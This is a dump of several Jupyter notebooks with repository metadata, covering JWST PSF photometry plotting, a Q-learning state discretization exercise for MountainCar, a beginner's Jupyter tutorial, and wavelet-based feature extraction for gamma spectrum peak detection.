xlim1)\nax2.set_ylim(ylim0, ylim1)\nax2.set_title(filt2, fontdict=font2)\n\nax2.xaxis.set_major_locator(ticker.AutoLocator())\nax2.xaxis.set_minor_locator(ticker.AutoMinorLocator())\nax2.yaxis.set_major_locator(ticker.AutoLocator())\nax2.yaxis.set_minor_locator(ticker.AutoMinorLocator())\n\nax2.set_xlabel('$\\Delta$ RA (mas)', fontdict=font2)\nax2.set_ylabel('$\\Delta$ Dec (mas)', fontdict=font2)\n\nra_f200w_inp_cfr = np.array(cat_sel['ra_in'][sep_f200w_cfr])\nra_f200w_psf_cfr = np.array(radec_f200w.ra[idx_f200w_cfr[sep_f200w_cfr]])\n\ndec_f200w_inp_cfr = np.array(cat_sel['dec_in'][sep_f200w_cfr])\ndec_f200w_psf_cfr = np.array(radec_f200w.dec[idx_f200w_cfr[sep_f200w_cfr]])\n\ndec_rad_f200w = np.radians(dec_f200w_psf_cfr)\n\ndiffra_f200w_cfr = ((((ra_f200w_inp_cfr - ra_f200w_psf_cfr) * np.cos(dec_rad_f200w)) * u.deg).to(u.mas) / (1 * u.mas))\n\n_, med_diffra_f200w_cfr, sig_diffra_f200w_cfr = sigma_clipped_stats(diffra_f200w_cfr)\n\ndiffdec_f200w_cfr = (((dec_f200w_inp_cfr - dec_f200w_psf_cfr) * u.deg).to(u.mas) / (1 * u.mas))\n\n_, med_diffdec_f200w_cfr, sig_diffdec_f200w_cfr = sigma_clipped_stats(diffdec_f200w_cfr)\n\nax2.scatter(diffra_f200w_cfr, diffdec_f200w_cfr, s=1, color='k')\nax2.plot([0, 0], [ylim0, ylim1], color='k', lw=2, ls='--')\nax2.plot([xlim0, xlim1], [0, 0], color='k', lw=2, ls='--')\n\nax2.text(xlim0 + 0.05, ylim1 - 1.50, ' $\\Delta$ RA (mas) = %5.3f $\\pm$ %5.3f'\n % (med_diffra_f200w_cfr, sig_diffra_f200w_cfr), color='k', fontdict=font2)\nax2.text(xlim0 + 0.05, ylim1 - 3.0, ' $\\Delta$ Dec (mas) = %5.3f $\\pm$ %5.3f'\n % (med_diffdec_f200w_cfr, sig_diffdec_f200w_cfr), color='k', fontdict=font2)\n\nplt.tight_layout()",
"_____no_output_____"
]
],
[
[
"## Final notes\n\nThis notebook provides a general overview on how to perform PSF photometry using the [PhotUtils](https://photutils.readthedocs.io/en/stable/) package. The choice of the different parameters adopted in all the reduction steps as well as the choice of the PSF model depend on the specific user science case. Moreover, a detailed analysis that allow to provide recommendations on how to set those parameters and outline the differences in the output photometry when different PSF models are adopted (single vs PSF grid, number of PSFs in the grid, etc.) will be possible only when real data will be available after the instrument commissioning. In this context, we note that one of the selected ERS program (ERS 1334 - The Resolved Stellar Populations Early Release Science Program) will provide a fundamental test benchmark to explore how the different choices outlined above will impact the quality of the PSF photometry in a crowded stellar region.",
"_____no_output_____"
],
[
"## About this Notebook\n\n**Author**: Matteo Correnti, JWST/NIRCam STScI Scientist II \\\n**Updated on**: 2021-01-15",
"_____no_output_____"
],
[
"[Top of Page](#top)\n\n<img style=\"float: right;\" src=\"https://raw.githubusercontent.com/spacetelescope/notebooks/master/assets/stsci_pri_combo_mark_horizonal_white_bkgd.png\" alt=\"Space Telescope Logo\" width=\"200px\"/>",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
]
] |
e70756a0c3c2e5efa258dceade6b7e8838df1d22 | 29,263 | ipynb | Jupyter Notebook | discretization/Discretization.ipynb | rising-turtle/deep-reinforcement-learning | 6afbfd161df94fca2e18beb2386639ea26c3855b | [
"MIT"
] | null | null | null | discretization/Discretization.ipynb | rising-turtle/deep-reinforcement-learning | 6afbfd161df94fca2e18beb2386639ea26c3855b | [
"MIT"
] | null | null | null | discretization/Discretization.ipynb | rising-turtle/deep-reinforcement-learning | 6afbfd161df94fca2e18beb2386639ea26c3855b | [
"MIT"
] | null | null | null | 42.105036 | 2,046 | 0.579742 | [
[
[
"# Discretization\n\n---\n\nIn this notebook, you will deal with continuous state and action spaces by discretizing them. This will enable you to apply reinforcement learning algorithms that are only designed to work with discrete spaces.\n\n### 1. Import the Necessary Packages",
"_____no_output_____"
]
],
[
[
"import sys\nimport gym\nimport numpy as np\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n# Set plotting options\n%matplotlib inline\nplt.style.use('ggplot')\nnp.set_printoptions(precision=3, linewidth=120)",
"_____no_output_____"
]
],
[
[
"### 2. Specify the Environment, and Explore the State and Action Spaces\n\nWe'll use [OpenAI Gym](https://gym.openai.com/) environments to test and develop our algorithms. These simulate a variety of classic as well as contemporary reinforcement learning tasks. Let's use an environment that has a continuous state space, but a discrete action space.",
"_____no_output_____"
]
],
[
[
"# Create an environment and set random seed\nenv = gym.make('MountainCar-v0')\nenv.seed(505);",
"_____no_output_____"
]
],
[
[
"Run the next code cell to watch a random agent.",
"_____no_output_____"
]
],
[
[
"state = env.reset()\nscore = 0\nfor t in range(200):\n action = env.action_space.sample()\n env.render()\n state, reward, done, _ = env.step(action)\n score += reward\n if done:\n break \nprint('Final score:', score)\nenv.close()",
"_____no_output_____"
]
],
[
[
"In this notebook, you will train an agent to perform much better! For now, we can explore the state and action spaces, as well as sample them.",
"_____no_output_____"
]
],
[
[
"# Explore state (observation) space\nprint(\"State space:\", env.observation_space)\nprint(\"- low:\", env.observation_space.low)\nprint(\"- high:\", env.observation_space.high)",
"_____no_output_____"
],
[
"# Generate some samples from the state space \nprint(\"State space samples:\")\nprint(np.array([env.observation_space.sample() for i in range(10)]))",
"_____no_output_____"
],
[
"# Explore the action space\nprint(\"Action space:\", env.action_space)\n\n# Generate some samples from the action space\nprint(\"Action space samples:\")\nprint(np.array([env.action_space.sample() for i in range(10)]))",
"_____no_output_____"
]
],
[
[
"### 3. Discretize the State Space with a Uniform Grid\n\nWe will discretize the space using a uniformly-spaced grid. Implement the following function to create such a grid, given the lower bounds (`low`), upper bounds (`high`), and number of desired `bins` along each dimension. It should return the split points for each dimension, which will be 1 less than the number of bins.\n\nFor instance, if `low = [-1.0, -5.0]`, `high = [1.0, 5.0]`, and `bins = (10, 10)`, then your function should return the following list of 2 NumPy arrays:\n\n```\n[array([-0.8, -0.6, -0.4, -0.2, 0.0, 0.2, 0.4, 0.6, 0.8]),\n array([-4.0, -3.0, -2.0, -1.0, 0.0, 1.0, 2.0, 3.0, 4.0])]\n```\n\nNote that the ends of `low` and `high` are **not** included in these split points. It is assumed that any value below the lowest split point maps to index `0` and any value above the highest split point maps to index `n-1`, where `n` is the number of bins along that dimension.",
"_____no_output_____"
]
],
[
[
"def create_uniform_grid(low, high, bins=(10, 10)):\n \"\"\"Define a uniformly-spaced grid that can be used to discretize a space.\n \n Parameters\n ----------\n low : array_like\n Lower bounds for each dimension of the continuous space.\n high : array_like\n Upper bounds for each dimension of the continuous space.\n bins : tuple\n Number of bins along each corresponding dimension.\n \n Returns\n -------\n grid : list of array_like\n A list of arrays containing split points for each dimension.\n \"\"\"\n # TODO: Implement this\n space = (np.array(high) - np.array(low))/np.array(bins)\n return [np.array([ (l+b*s) for i in range(1,b)] for (l, b, s) in zip(low, bins, space))]\n\n\nlow = [-1.0, -5.0]\nhigh = [1.0, 5.0]\ncreate_uniform_grid(low, high) # [test]",
"_____no_output_____"
]
],
[
[
"Now write a function that can convert samples from a continuous space into its equivalent discretized representation, given a grid like the one you created above. You can use the [`numpy.digitize()`](https://docs.scipy.org/doc/numpy-1.9.3/reference/generated/numpy.digitize.html) function for this purpose.\n\nAssume the grid is a list of NumPy arrays containing the following split points:\n```\n[array([-0.8, -0.6, -0.4, -0.2, 0.0, 0.2, 0.4, 0.6, 0.8]),\n array([-4.0, -3.0, -2.0, -1.0, 0.0, 1.0, 2.0, 3.0, 4.0])]\n```\n\nHere are some potential samples and their corresponding discretized representations:\n```\n[-1.0 , -5.0] => [0, 0]\n[-0.81, -4.1] => [0, 0]\n[-0.8 , -4.0] => [1, 1]\n[-0.5 , 0.0] => [2, 5]\n[ 0.2 , -1.9] => [6, 3]\n[ 0.8 , 4.0] => [9, 9]\n[ 0.81, 4.1] => [9, 9]\n[ 1.0 , 5.0] => [9, 9]\n```\n\n**Note**: There may be one-off differences in binning due to floating-point inaccuracies when samples are close to grid boundaries, but that is alright.",
"_____no_output_____"
]
],
[
[
"def discretize(sample, grid):\n \"\"\"Discretize a sample as per given grid.\n \n Parameters\n ----------\n sample : array_like\n A single sample from the (original) continuous space.\n grid : list of array_like\n A list of arrays containing split points for each dimension.\n \n Returns\n -------\n discretized_sample : array_like\n A sequence of integers with the same number of dimensions as sample.\n \"\"\"\n # TODO: Implement this\n return list( int(np.digitize(s, g)) for (s,g) in zip(sample, grid))\n\n\n# Test with a simple grid and some samples\ngrid = create_uniform_grid([-1.0, -5.0], [1.0, 5.0])\nsamples = np.array(\n [[-1.0 , -5.0],\n [-0.81, -4.1],\n [-0.8 , -4.0],\n [-0.5 , 0.0],\n [ 0.2 , -1.9],\n [ 0.8 , 4.0],\n [ 0.81, 4.1],\n [ 1.0 , 5.0]])\ndiscretized_samples = np.array([discretize(sample, grid) for sample in samples])\nprint(\"\\nSamples:\", repr(samples), sep=\"\\n\")\nprint(\"\\nDiscretized samples:\", repr(discretized_samples), sep=\"\\n\")",
"_____no_output_____"
]
],
[
[
"### 4. Visualization\n\nIt might be helpful to visualize the original and discretized samples to get a sense of how much error you are introducing.",
"_____no_output_____"
]
],
[
[
"import matplotlib.collections as mc\n\ndef visualize_samples(samples, discretized_samples, grid, low=None, high=None):\n \"\"\"Visualize original and discretized samples on a given 2-dimensional grid.\"\"\"\n\n fig, ax = plt.subplots(figsize=(10, 10))\n \n # Show grid\n ax.xaxis.set_major_locator(plt.FixedLocator(grid[0]))\n ax.yaxis.set_major_locator(plt.FixedLocator(grid[1]))\n ax.grid(True)\n \n # If bounds (low, high) are specified, use them to set axis limits\n if low is not None and high is not None:\n ax.set_xlim(low[0], high[0])\n ax.set_ylim(low[1], high[1])\n else:\n # Otherwise use first, last grid locations as low, high (for further mapping discretized samples)\n low = [splits[0] for splits in grid]\n high = [splits[-1] for splits in grid]\n\n # Map each discretized sample (which is really an index) to the center of corresponding grid cell\n grid_extended = np.hstack((np.array([low]).T, grid, np.array([high]).T)) # add low and high ends\n grid_centers = (grid_extended[:, 1:] + grid_extended[:, :-1]) / 2 # compute center of each grid cell\n locs = np.stack(grid_centers[i, discretized_samples[:, i]] for i in range(len(grid))).T # map discretized samples\n\n ax.plot(samples[:, 0], samples[:, 1], 'o') # plot original samples\n ax.plot(locs[:, 0], locs[:, 1], 's') # plot discretized samples in mapped locations\n ax.add_collection(mc.LineCollection(list(zip(samples, locs)), colors='orange')) # add a line connecting each original-discretized sample\n ax.legend(['original', 'discretized'])\n\n \nvisualize_samples(samples, discretized_samples, grid, low, high)",
"_____no_output_____"
]
],
[
[
"Now that we have a way to discretize a state space, let's apply it to our reinforcement learning environment.",
"_____no_output_____"
]
],
[
[
"# Create a grid to discretize the state space\nstate_grid = create_uniform_grid(env.observation_space.low, env.observation_space.high, bins=(10, 10))\nstate_grid",
"_____no_output_____"
],
[
"# Obtain some samples from the space, discretize them, and then visualize them\nstate_samples = np.array([env.observation_space.sample() for i in range(10)])\ndiscretized_state_samples = np.array([discretize(sample, state_grid) for sample in state_samples])\nvisualize_samples(state_samples, discretized_state_samples, state_grid,\n env.observation_space.low, env.observation_space.high)\nplt.xlabel('position'); plt.ylabel('velocity'); # axis labels for MountainCar-v0 state space",
"_____no_output_____"
]
],
[
[
"You might notice that if you have enough bins, the discretization doesn't introduce too much error into your representation. So we may be able to now apply a reinforcement learning algorithm (like Q-Learning) that operates on discrete spaces. Give it a shot to see how well it works!\n\n### 5. Q-Learning\n\nProvided below is a simple Q-Learning agent. Implement the `preprocess_state()` method to convert each continuous state sample to its corresponding discretized representation.",
"_____no_output_____"
]
],
[
[
"class QLearningAgent:\n \"\"\"Q-Learning agent that can act on a continuous state space by discretizing it.\"\"\"\n\n def __init__(self, env, state_grid, alpha=0.02, gamma=0.99,\n epsilon=1.0, epsilon_decay_rate=0.9995, min_epsilon=.01, seed=505):\n \"\"\"Initialize variables, create grid for discretization.\"\"\"\n # Environment info\n self.env = env\n self.state_grid = state_grid\n self.state_size = tuple(len(splits) + 1 for splits in self.state_grid) # n-dimensional state space\n self.action_size = self.env.action_space.n # 1-dimensional discrete action space\n self.seed = np.random.seed(seed)\n print(\"Environment:\", self.env)\n print(\"State space size:\", self.state_size)\n print(\"Action space size:\", self.action_size)\n \n # Learning parameters\n self.alpha = alpha # learning rate\n self.gamma = gamma # discount factor\n self.epsilon = self.initial_epsilon = epsilon # initial exploration rate\n self.epsilon_decay_rate = epsilon_decay_rate # how quickly should we decrease epsilon\n self.min_epsilon = min_epsilon\n \n # Create Q-table\n self.q_table = np.zeros(shape=(self.state_size + (self.action_size,)))\n print(\"Q table size:\", self.q_table.shape)\n\n def preprocess_state(self, state):\n \"\"\"Map a continuous state to its discretized representation.\"\"\"\n # TODO: Implement this\n pass\n\n def reset_episode(self, state):\n \"\"\"Reset variables for a new episode.\"\"\"\n # Gradually decrease exploration rate\n self.epsilon *= self.epsilon_decay_rate\n self.epsilon = max(self.epsilon, self.min_epsilon)\n\n # Decide initial action\n self.last_state = self.preprocess_state(state)\n self.last_action = np.argmax(self.q_table[self.last_state])\n return self.last_action\n \n def reset_exploration(self, epsilon=None):\n \"\"\"Reset exploration rate used when training.\"\"\"\n self.epsilon = epsilon if epsilon is not None else self.initial_epsilon\n\n def act(self, state, reward=None, done=None, mode='train'):\n \"\"\"Pick next action and update internal Q table (when mode != 'test').\"\"\"\n state = self.preprocess_state(state)\n if mode == 'test':\n # Test mode: Simply produce an action\n action = np.argmax(self.q_table[state])\n else:\n # Train mode (default): Update Q table, pick next action\n # Note: We update the Q table entry for the *last* (state, action) pair with current state, reward\n self.q_table[self.last_state + (self.last_action,)] += self.alpha * \\\n (reward + self.gamma * max(self.q_table[state]) - self.q_table[self.last_state + (self.last_action,)])\n\n # Exploration vs. exploitation\n do_exploration = np.random.uniform(0, 1) < self.epsilon\n if do_exploration:\n # Pick a random action\n action = np.random.randint(0, self.action_size)\n else:\n # Pick the best action from Q table\n action = np.argmax(self.q_table[state])\n\n # Roll over current state, action for next step\n self.last_state = state\n self.last_action = action\n return action\n\n \nq_agent = QLearningAgent(env, state_grid)",
"_____no_output_____"
]
],
[
[
"Let's also define a convenience function to run an agent on a given environment. When calling this function, you can pass in `mode='test'` to tell the agent not to learn.",
"_____no_output_____"
]
],
[
[
"def run(agent, env, num_episodes=20000, mode='train'):\n \"\"\"Run agent in given reinforcement learning environment and return scores.\"\"\"\n scores = []\n max_avg_score = -np.inf\n for i_episode in range(1, num_episodes+1):\n # Initialize episode\n state = env.reset()\n action = agent.reset_episode(state)\n total_reward = 0\n done = False\n\n # Roll out steps until done\n while not done:\n state, reward, done, info = env.step(action)\n total_reward += reward\n action = agent.act(state, reward, done, mode)\n\n # Save final score\n scores.append(total_reward)\n \n # Print episode stats\n if mode == 'train':\n if len(scores) > 100:\n avg_score = np.mean(scores[-100:])\n if avg_score > max_avg_score:\n max_avg_score = avg_score\n\n if i_episode % 100 == 0:\n print(\"\\rEpisode {}/{} | Max Average Score: {}\".format(i_episode, num_episodes, max_avg_score), end=\"\")\n sys.stdout.flush()\n\n return scores\n\nscores = run(q_agent, env)",
"_____no_output_____"
]
],
[
[
"The best way to analyze if your agent was learning the task is to plot the scores. It should generally increase as the agent goes through more episodes.",
"_____no_output_____"
]
],
[
[
"# Plot scores obtained per episode\nplt.plot(scores); plt.title(\"Scores\");",
"_____no_output_____"
]
],
[
[
"If the scores are noisy, it might be difficult to tell whether your agent is actually learning. To find the underlying trend, you may want to plot a rolling mean of the scores. Let's write a convenience function to plot both raw scores as well as a rolling mean.",
"_____no_output_____"
]
],
[
[
"def plot_scores(scores, rolling_window=100):\n \"\"\"Plot scores and optional rolling mean using specified window.\"\"\"\n plt.plot(scores); plt.title(\"Scores\");\n rolling_mean = pd.Series(scores).rolling(rolling_window).mean()\n plt.plot(rolling_mean);\n return rolling_mean\n\nrolling_mean = plot_scores(scores)",
"_____no_output_____"
]
],
[
[
"You should observe the mean episode scores go up over time. Next, you can freeze learning and run the agent in test mode to see how well it performs.",
"_____no_output_____"
]
],
[
[
"# Run in test mode and analyze scores obtained\ntest_scores = run(q_agent, env, num_episodes=100, mode='test')\nprint(\"[TEST] Completed {} episodes with avg. score = {}\".format(len(test_scores), np.mean(test_scores)))\n_ = plot_scores(test_scores, rolling_window=10)",
"_____no_output_____"
]
],
[
[
"It's also interesting to look at the final Q-table that is learned by the agent. Note that the Q-table is of size MxNxA, where (M, N) is the size of the state space, and A is the size of the action space. We are interested in the maximum Q-value for each state, and the corresponding (best) action associated with that value.",
"_____no_output_____"
]
],
[
[
"def plot_q_table(q_table):\n \"\"\"Visualize max Q-value for each state and corresponding action.\"\"\"\n q_image = np.max(q_table, axis=2) # max Q-value for each state\n q_actions = np.argmax(q_table, axis=2) # best action for each state\n\n fig, ax = plt.subplots(figsize=(10, 10))\n cax = ax.imshow(q_image, cmap='jet');\n cbar = fig.colorbar(cax)\n for x in range(q_image.shape[0]):\n for y in range(q_image.shape[1]):\n ax.text(x, y, q_actions[x, y], color='white',\n horizontalalignment='center', verticalalignment='center')\n ax.grid(False)\n ax.set_title(\"Q-table, size: {}\".format(q_table.shape))\n ax.set_xlabel('position')\n ax.set_ylabel('velocity')\n\n\nplot_q_table(q_agent.q_table)",
"_____no_output_____"
]
],
[
[
"### 6. Modify the Grid\n\nNow it's your turn to play with the grid definition and see what gives you optimal results. Your agent's final performance is likely to get better if you use a finer grid, with more bins per dimension, at the cost of higher model complexity (more parameters to learn).",
"_____no_output_____"
]
],
[
[
"# TODO: Create a new agent with a different state space grid\nstate_grid_new = create_uniform_grid(?, ?, bins=(?, ?))\nq_agent_new = QLearningAgent(env, state_grid_new)\nq_agent_new.scores = [] # initialize a list to store scores for this agent",
"_____no_output_____"
],
[
"# Train it over a desired number of episodes and analyze scores\n# Note: This cell can be run multiple times, and scores will get accumulated\nq_agent_new.scores += run(q_agent_new, env, num_episodes=50000) # accumulate scores\nrolling_mean_new = plot_scores(q_agent_new.scores)",
"_____no_output_____"
],
[
"# Run in test mode and analyze scores obtained\ntest_scores = run(q_agent_new, env, num_episodes=100, mode='test')\nprint(\"[TEST] Completed {} episodes with avg. score = {}\".format(len(test_scores), np.mean(test_scores)))\n_ = plot_scores(test_scores)",
"_____no_output_____"
],
[
"# Visualize the learned Q-table\nplot_q_table(q_agent_new.q_table)",
"_____no_output_____"
]
],
[
[
"### 7. Watch a Smart Agent",
"_____no_output_____"
]
],
[
[
"state = env.reset()\nscore = 0\nfor t in range(200):\n action = q_agent_new.act(state, mode='test')\n env.render()\n state, reward, done, _ = env.step(action)\n score += reward\n if done:\n break \nprint('Final score:', score)\nenv.close()",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
]
] |
e70761251cc9e4649acb32be3bd5825d7d8c7d31 | 2,721 | ipynb | Jupyter Notebook | first_notebook.ipynb | hakimyameen/LearnDataScience | db94eaf19c5690d3b60ff28730c322da41a00240 | [
"BSD-2-Clause"
] | null | null | null | first_notebook.ipynb | hakimyameen/LearnDataScience | db94eaf19c5690d3b60ff28730c322da41a00240 | [
"BSD-2-Clause"
] | null | null | null | first_notebook.ipynb | hakimyameen/LearnDataScience | db94eaf19c5690d3b60ff28730c322da41a00240 | [
"BSD-2-Clause"
] | null | null | null | 2,721 | 2,721 | 0.673282 | [
[
[
"print('Hello world')",
"_____no_output_____"
],
[
"print(1233454656)",
"_____no_output_____"
],
[
"a = 22",
"_____no_output_____"
],
[
"a",
"_____no_output_____"
],
[
"b = 123",
"_____no_output_____"
],
[
"b",
"_____no_output_____"
],
[
"a",
"_____no_output_____"
],
[
"b",
"_____no_output_____"
]
],
[
[
"print('This is markdown')",
"_____no_output_____"
]
],
[
[
"This is RawNB convert\nThis is RawNB convert\nThis is RawNB convert\nThis is RawNB convert\nThis is RawNB convert\nadd new things\nin \nit",
"_____no_output_____"
]
],
[
[
"# Heading / title",
"_____no_output_____"
],
[
"## Heading title",
"_____no_output_____"
],
[
"### Heading",
"_____no_output_____"
],
[
"#### Heading",
"_____no_output_____"
],
[
"###### Heading",
"_____no_output_____"
],
[
"####### Heading",
"_____no_output_____"
],
[
"# Shortcut for heading- use numeric keys 1-6",
"_____no_output_____"
]
],
[
[
"Insert cell below: select the cell and press key char. b",
"_____no_output_____"
],
[
"insert cell above:select the cell and press key char. a",
"_____no_output_____"
],
[
"WHen we want to delet cell then select cell and press x",
"_____no_output_____"
]
],
[
[
"print()",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"raw",
"markdown",
"code",
"raw"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"raw"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"raw"
]
] |
e70781151dd7b017045e17c9b8cddd9b329b24ad | 104,140 | ipynb | Jupyter Notebook | notebooks/02-feature-extraction.ipynb | brunoarine/ML-peak-detection | 715709fd4bc3466d41a93de09751b8b3e6c16e76 | [
"BSD-3-Clause"
] | null | null | null | notebooks/02-feature-extraction.ipynb | brunoarine/ML-peak-detection | 715709fd4bc3466d41a93de09751b8b3e6c16e76 | [
"BSD-3-Clause"
] | null | null | null | notebooks/02-feature-extraction.ipynb | brunoarine/ML-peak-detection | 715709fd4bc3466d41a93de09751b8b3e6c16e76 | [
"BSD-3-Clause"
] | null | null | null | 456.754386 | 40,940 | 0.94252 | [
[
[
"import os\nimport sys\nmodule_path = os.path.abspath(os.path.join('..'))\nif module_path not in sys.path:\n sys.path.append(module_path)\nimport pickle\nimport gzip\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import signal\nfrom sklearn import linear_model\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.preprocessing import StandardScaler \nfrom sklearn.ensemble import RandomForestClassifier\nfrom helpers import plotcfg\nfrom helpers import preprocessing\n",
"_____no_output_____"
],
[
"X, y, d = pickle.load(gzip.open('../data/artificial.pickle', 'rb'), encoding='latin1')",
"_____no_output_____"
]
],
[
[
"## Getting rid of the baseline and extracting new features\n\nThe different intensities of the continuum in the spectra, which may come from different interferences in the samples, hinder the performance of the ML models if they are not corrected. Furthermore, we could make use of some of the signal processing toolkit that could give the machine learning model novel insights about the spectrum. Therefore, I decided to use a **wavelet transform** (and the Ricker operator) which will both flat out the different baseline heights, and will generate new data for the model.\n",
"_____no_output_____"
]
],
[
[
"sig = X[0]\nmaxwidth = 5 \nwidths = np.arange(1, maxwidth)\ncwtmatr = signal.cwt(sig, signal.ricker, widths)",
"_____no_output_____"
],
[
"plt.figure(figsize=(8,4))\na = 10\npoints = 100\nvec2 = signal.ricker(points, a)\nplt.plot(vec2, color='black')\nplt.show()",
"_____no_output_____"
]
],
[
[
"Say hello to my magical Mexican hat.",
"_____no_output_____"
]
],
[
[
"plt.figure(figsize=(10,4))\nplt.subplot(1,2,1)\nplt.plot(sig, color=\"black\")\nplt.xlim(0,100)\nplt.ylim(0,200)\nplt.ylabel('Counts')\nplt.xlabel('Channel')\n\nplt.subplot(1,2,2)\nplt.imshow(cwtmatr, extent=[0, 100, maxwidth, 1], cmap='viridis', aspect='auto',\n vmax=abs(cwtmatr).max(), vmin=-abs(cwtmatr).max())\nplt.yticks(np.arange(1,6),np.arange(1,6))\nplt.ylabel('Width')\nplt.xlabel('Channel')\n\n\nplt.subplots_adjust(wspace=0.3, hspace=0.4)\nplt.show()",
"_____no_output_____"
]
],
[
[
"Example of the original signal (left), and the same signal after the wavelet transform (right).",
"_____no_output_____"
],
[
"## Dimensionality reduction\n\nThe dimensionality reduction of the model was made through the selection of the most relevant input parameters, discarding the redundant parameters that do not contribute to the performance of the AI model. For this task, a random forest was used.",
"_____no_output_____"
]
],
[
[
"forest = RandomForestClassifier()\nx_cwt = preprocessing.Cwt().transform(X)\nforest.fit(x_cwt, y)\nimportances = forest.feature_importances_",
"_____no_output_____"
],
[
"plt.figure(figsize=(10,4))\nplt.subplot(1,2,1)\nplt.imshow(cwtmatr, extent=[0, 100, maxwidth, 1], cmap='viridis', aspect='auto',\n vmax=abs(cwtmatr).max(), vmin=-abs(cwtmatr).max())\nplt.yticks(np.arange(1,6),np.arange(1,6))\nplt.ylabel('Width')\nplt.xlabel('Channel')\nplt.title('Wavelet map')\n\nplt.subplot(1,2,2)\nplt.imshow(importances.reshape(cwtmatr.shape), extent=[0, 100, maxwidth, 1], cmap='viridis', aspect='auto',\n vmax=importances.max(), vmin=importances.min())\n\nplt.ylabel('Width')\nplt.xlabel('Channel')\nplt.title('Feature importance')\n\nplt.subplots_adjust(wspace=0.3, hspace=0.4)\nplt.show()",
"_____no_output_____"
]
],
[
[
"After mapping out which parts of the wavelet map (left) carries the most relevant informat (right), now it's time to implement the machine learning model and see how it performs.",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
]
] |
e70788064cc54d6015bcc64aa78e726810e564b8 | 169,427 | ipynb | Jupyter Notebook | docs/beta/notebooks/Reducer.ipynb | BharathMonash/fuzzingbook | c734bccc4515b2561f1bfa2313f73d02eede2057 | [
"MIT"
] | null | null | null | docs/beta/notebooks/Reducer.ipynb | BharathMonash/fuzzingbook | c734bccc4515b2561f1bfa2313f73d02eede2057 | [
"MIT"
] | null | null | null | docs/beta/notebooks/Reducer.ipynb | BharathMonash/fuzzingbook | c734bccc4515b2561f1bfa2313f73d02eede2057 | [
"MIT"
] | 1 | 2021-01-26T02:30:59.000Z | 2021-01-26T02:30:59.000Z | 35.107128 | 858 | 0.514428 | [
[
[
